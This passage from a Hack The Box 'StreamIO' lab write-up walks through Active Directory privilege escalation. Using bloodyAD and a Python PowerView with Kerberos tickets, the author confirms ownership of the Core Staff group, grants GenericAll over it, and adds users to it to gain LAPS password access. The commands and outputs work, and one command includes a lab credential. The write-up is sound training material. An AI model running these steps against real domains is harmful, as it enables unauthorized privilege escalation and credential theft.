Ownership to a Domain object
Successful lateral movement to the JDgodd user allows a great opportunity to further leverage the ACE discovered during the BloodHound session earlier.
┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ bloodyAD -d STREAMIO.HTB -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' --host dc.streamio.htb get object 'CN=CORE STAFF,CN=USERS,DC=STREAMIO,DC=HTB' --resolve-sd | grep Owner
ntsecuritydescriptor.owner: JDgoddThe JDgodd user has ownership over the Core Staff group
This would essentially mean that the user has the complete control over the aforementioned domain object, leading to DACL abuse
dacl abuse
While there are many methods that can be employed to perform such operation, the generated TGT will be utilized to emphasis the importance of OPSEC from a perspective of an adversary. Additionally, a Python implementation of Poweview will be used for remote operation.
It’s also important to note that the tool itself is rather incomplete as it doesn’t support all the PowerView’s features. However, it does contain all the necessary commands in this particular use case
WriteOwner?
┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ KRB5CCNAME=JDgodd@dc.streamio.htb.ccache powerview 'streamio.htb/@dc.streamio.htb' -k --no-pass --dc-ip $IP -q 'Set-DomainObjectOwner -TargetIdentity "CN=CORE STAFF,CN=USERS,DC=STREAMIO,DC=HTB" -PrincipalIdentity "CN=JDGODD,CN=USERS,DC=STREAMIO,DC=HTB"'
[2023-11-15 01:53:16] LDAP Signing NOT Enforced!
[2023-11-15 01:53:16] [Set-DomainObjectOwner] JDgodd is already the owner of the CN=CORE STAFF,CN=Users,DC=streamIO,DC=htbI tried testing out the strange WriteOwner privilege shown in the BloodHound session, and the output shows the JDgodd user ALREADY owns the domain object; CN=CORE STAFF,CN=USERS,DC=STREAMIO,DC=HTB
So it was likely a false-positive error from BloodHound since the ownership is already there
Moving on
GenericAll
┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ KRB5CCNAME=JDgodd@dc.streamio.htb.ccache powerview 'streamio.htb/@dc.streamio.htb' -k --no-pass --dc-ip $IP -q 'Add-DomainObjectAcl -TargetIdentity "CN=CORE STAFF,CN=USERS,DC=STREAMIO,DC=HTB" -PrincipalIdentity JDgodd -Rights All'
[2023-11-15 01:56:21] LDAP Signing NOT Enforced!
[2023-11-15 01:56:21] Found principal identity dn CN=JDgodd,CN=Users,DC=streamIO,DC=htb
[2023-11-15 01:56:21] Found target identity dn CN=CORE STAFF,CN=Users,DC=streamIO,DC=htb
[2023-11-15 01:56:21] Adding all privilege to CN=CORE STAFF,CN=USERS,DC=STREAMIO,DC=HTB
[2023-11-15 01:56:22] Success! User JDgodd now has GenericAll privileges on CN=CORE STAFF,CN=USERS,DC=STREAMIO,DC=HTBFirst, I will need to grant the JDgod user the complete control over the Staff Core group, using the Ownership privilege
The JDgodd user now has the GenericAll privilege over the domain object
Add-DomainGroupMember
┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ KRB5CCNAME=JDgodd@dc.streamio.htb.ccache powerview 'streamio.htb/@dc.streamio.htb' -k --no-pass --dc-ip $IP -q 'Add-DomainGroupMember -Identity "CN=CORE STAFF,CN=USERS,DC=STREAMIO,DC=HTB" -Members JDgodd'
[2023-11-15 02:03:33] LDAP Signing NOT Enforced!
[2023-11-15 02:03:33] User JDgodd successfully added to CN=CORE STAFF,CN=USERS,DC=STREAMIO,DC=HTB
┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ KRB5CCNAME=JDgodd@dc.streamio.htb.ccache powerview 'streamio.htb/@dc.streamio.htb' -k --no-pass --dc-ip $IP -q 'Add-DomainGroupMember -Identity "CN=CORE STAFF,CN=USERS,DC=STREAMIO,DC=HTB" -Members nikk37'
[2023-11-15 02:40:03] LDAP Signing NOT Enforced!
[2023-11-15 02:40:03] User nikk37 successfully added to CN=CORE STAFF,CN=USERS,DC=STREAMIO,DC=HTBI can then proceed to grant the JDgodd user (or anyone) a membership to the Staff Core group, using the previously gained GenericAll privilege
For ease of access, I also added the nikk37 user to the group as there is already an existing PowerShell session with the user
Verify
┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ KRB5CCNAME=JDgodd@dc.streamio.htb.ccache powerview 'streamio.htb/@dc.streamio.htb' -k --no-pass --dc-ip $IP -q 'Get-DomainGroupMember -Identity "CN=CORE STAFF,CN=USERS,DC=STREAMIO,DC=HTB"'
[2023-11-15 02:41:50] LDAP Signing NOT Enforced!
GroupDomainName : CORE STAFF
GroupDistinguishedName : CN=CORE STAFF,CN=Users,DC=streamIO,DC=htb
MemberDomain : streamio.htb
MemberName : JDgodd
MemberDistinguishedName : CN=JDgodd,CN=Users,DC=streamIO,DC=htb
MemberSID : S-1-5-21-1470860369-1569627196-4264678630-1104
GroupDomainName : CORE STAFF
GroupDistinguishedName : CN=CORE STAFF,CN=Users,DC=streamIO,DC=htb
MemberDomain : streamio.htb
MemberName : nikk37
MemberDistinguishedName : CN=nikk37,CN=Users,DC=streamIO,DC=htb
MemberSID : S-1-5-21-1470860369-1569627196-4264678630-1106Both JDgodd and nikk37 users are now part of the Core Staff group
Lastly, the Core Staff group is a privileged group with the ReadLAPSPassword privilege
More on that will be cover in the [[StreamIO_ReadLAPSPassword#[ReadLAPSPassword](https //www.thehacker.recipes/a-d/movement/dacl/readlapspassword)|next section]]